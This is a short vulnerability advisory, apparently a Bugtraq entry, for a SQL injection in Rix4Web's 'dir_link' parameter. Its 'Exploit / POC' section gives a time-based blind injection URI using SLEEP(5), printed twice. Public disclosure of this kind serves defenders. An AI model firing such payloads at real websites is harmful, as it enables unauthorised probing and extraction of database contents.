Rix4Web 'dir_link' Parameter SQL Injection Vulnerability
BID:58132
Info
Rix4Web 'dir_link' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 58132 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 23 2013 12:00AM |
| Updated: | Feb 23 2013 12:00AM |
| Credit: | L0n3ly-H34rT |
| Vulnerable: |
Rix4Web Rix4Web 0 |
| Not Vulnerable: | |
Exploit / POC
Rix4Web 'dir_link' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following exploit URI is available:
http://www.example.com/rix/add-site.php?do=addnew&go=addcat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.
Attackers can use a browser to exploit this issue.
The following exploit URI is available:
http://www.example.com/rix/add-site.php?do=addnew&go=addcat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.